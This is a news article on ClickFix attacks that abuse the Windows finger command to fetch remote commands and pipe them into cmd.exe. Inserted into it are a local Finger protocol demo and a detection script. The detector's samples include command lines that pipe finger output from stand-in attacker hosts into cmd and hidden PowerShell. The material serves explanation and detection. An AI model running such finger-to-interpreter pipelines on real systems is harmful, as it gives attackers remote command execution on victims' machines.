Decades-old ‘finger’ Protocol Abused In Clickfix Malware Attacks

The decades-old "finger" command is making a comeback, with threat actors using the Finger protocol to retrieve remote commands that are then executed on Windows devices.

In the past, people used the finger command to look up information about local and remote users on Unix and Linux systems via the Finger protocol; the command was later added to Windows as well. While it is still supported, it is rarely used today compared to its popularity decades ago.

When executed, the finger command returns basic information about a user, including their login name, full name (if set in /etc/passwd), home directory, phone numbers, last login time, and other details.

Recently, there have been malicious campaigns utilizing the Finger protocol in what appear to be ClickFix attacks, with the finger command used to retrieve the commands that are then executed on the victim's device.

This is not the first time the finger command has been abused in this way: researchers warned in 2020 that it was being used as a LOLBIN (a "living-off-the-land binary", a legitimate system tool repurposed by attackers) to download malware and evade detection.

Last month, cybersecurity researcher MalwareHunterTeam shared a batch file [VirusTotal] with BleepingComputer that, when executed, would run the "finger [email protected][.]com" command to retrieve commands from a remote finger server and pipe the output into cmd.exe, which then executed them locally.
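To make the abuse concrete, the following Python script is an added example (not code from the article, from MalwareHunterTeam, or from the malware sample) that reproduces the Finger protocol exchange from both sides: the client sends a username line exactly as RFC 1288 describes, and the server answers with arbitrary text. The "server" here is a local one-shot listener on an ephemeral 127.0.0.1 port, and the returned payload is a harmless constructed string; both are assumptions for the demo. The point is that nothing in the protocol constrains the reply, so whatever the server sends back is what `finger user@host | cmd` feeds into cmd.exe line by line.

```python
import socket
import threading

FINGER_PORT = 79  # well-known Finger port (RFC 1288); the demo binds an ephemeral port instead

# Constructed payload standing in for what a malicious finger server would return.
# A real server in these campaigns would return the attacker's commands; cmd.exe
# reading from a pipe executes each line it receives.
CONSTRUCTED_RESPONSE = b"echo attacker-controlled text\r\nwhoami\r\n"


def serve_once(listener, response):
    """Accept one connection, read the RFC 1288 request line, send `response`, return the request."""
    conn, _ = listener.accept()
    with conn:
        request = b""
        while not request.endswith(b"\r\n"):
            chunk = conn.recv(1024)
            if not chunk:
                break
            request += chunk
        conn.sendall(response)  # any bytes at all; the protocol imposes no format on the reply
    return request


def start_finger_server(response=CONSTRUCTED_RESPONSE):
    """Start a one-shot finger server on 127.0.0.1:<ephemeral> in a thread; returns (port, state)."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))
    listener.listen(1)
    port = listener.getsockname()[1]
    state = {}

    def run():
        with listener:
            state["request"] = serve_once(listener, response)

    thread = threading.Thread(target=run, daemon=True)
    thread.start()
    state["thread"] = thread
    return port, state


def finger_query(host, user, port=FINGER_PORT, timeout=5.0):
    """Minimal Finger client: send '<user>\\r\\n' (what `finger user@host` transmits) and return the reply."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(user.encode("ascii") + b"\r\n")
        reply = b""
        while True:
            chunk = sock.recv(4096)
            if not chunk:  # server closes the connection after its reply
                break
            reply += chunk
    return reply


def commands_from_reply(reply):
    """Lines a shell reading this reply from stdin would execute, one per non-empty line."""
    return [line for line in reply.decode("utf-8", "replace").splitlines() if line.strip()]


def demo():
    """Run client and server locally; returns (request seen by server, reply seen by client)."""
    port, state = start_finger_server()
    reply = finger_query("127.0.0.1", "user", port=port)
    state["thread"].join(timeout=5)
    return state["request"], reply


if __name__ == "__main__":
    request, reply = demo()
    print("client sent:    ", request)
    print("server returned:", reply)
    print("cmd.exe would run:", commands_from_reply(reply))
```

Run it and the server sees exactly `b"user\r\n"` on the wire, while the client prints the constructed payload untouched. The Windows finger client has no notion of "valid" output, which is why piping it into an interpreter turns TCP/79 into a command channel.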

While that host is no longer accessible, MalwareHunterTeam found additional malware samples and attacks utilizing the finger command.
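Since finger.exe is almost never used legitimately on Windows, a process-creation command line that invokes it with a remote target and pipes the result into an interpreter is a cheap, high-signal detection. The Python below is an added example (not from the article or any named vendor rule) that scores constructed command lines such as those found in Sysmon Event ID 1 or Windows Security event 4688; the sample lines, hostnames and scoring thresholds are assumptions for illustration.

```python
import re

# Constructed sample process-creation command lines. None are real telemetry;
# they illustrate the patterns a detection should and should not fire on.
SAMPLE_COMMAND_LINES = [
    r'finger john@example.org',                                              # remote lookup, not piped
    r'C:\Windows\system32\cmd.exe /c finger user@attacker.example | cmd',    # the ClickFix pattern
    r'powershell -nop -w hidden -c "finger x@attacker.example | powershell -"',
    r'"C:\Program Files\App\app.exe" --finger-print',                        # unrelated substring
    r'finger',                                                               # local query only
]

# finger or finger.exe as a whole token (start of line, whitespace, quote or path separator before it)
FINGER_RE = re.compile(r'(?i)(?:^|[\s"\\/])finger(?:\.exe)?(?=\s|$)')
# output of finger piped into cmd/powershell/pwsh, with or without a full path
INTERPRETER_RE = re.compile(r'(?i)\|\s*"?(?:[a-z]:\\[^"\s]*\\)?(?:cmd|powershell|pwsh)(?:\.exe)?\b')


def analyze_command_line(cmdline):
    """Return (score, reasons): 0 = no finger, 1 = finger ran, 2 = remote user@host query,
    3 = remote query piped into a command interpreter (the LOLBIN download pattern)."""
    reasons = []
    match = FINGER_RE.search(cmdline)
    if not match:
        return 0, reasons
    reasons.append("finger client invoked")
    tail = cmdline[match.end():]
    # the finger arguments are everything up to the first pipe; '@' marks a remote host
    if "@" in tail.split("|", 1)[0]:
        reasons.append("remote finger target (user@host)")
    if INTERPRETER_RE.search(tail):
        reasons.append("finger output piped into a command interpreter")
    return len(reasons), reasons


def triage(cmdlines, alert_at=2):
    """Return [(score, cmdline)] for every line at or above `alert_at`, highest score first."""
    hits = [(analyze_command_line(c)[0], c) for c in cmdlines]
    return sorted([h for h in hits if h[0] >= alert_at], key=lambda h: -h[0])


if __name__ == "__main__":
    for score, cmdline in triage(SAMPLE_COMMAND_LINES):
        print(score, cmdline)
```

Scoring on the command line alone keeps the rule portable across EDR and SIEM products; in an environment with parent/child process data, also alert when finger.exe's parent is cmd.exe or powershell.exe and a sibling interpreter starts within the same second, which catches the batch-file variant even if the command line is obfuscated.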

For example, a Reddit user recently warned that they had fallen victim to a ClickFix attack that impersonated a CAPTCHA, prompting them to run a Windows command to "verify" they were human.

"I just fell for 'verify you are human' win + r. What do I do?" reads the Reddit post.

"I was in a rush and fell for this and ended up entering the following in my cmd prompt:"

Source: BleepingComputer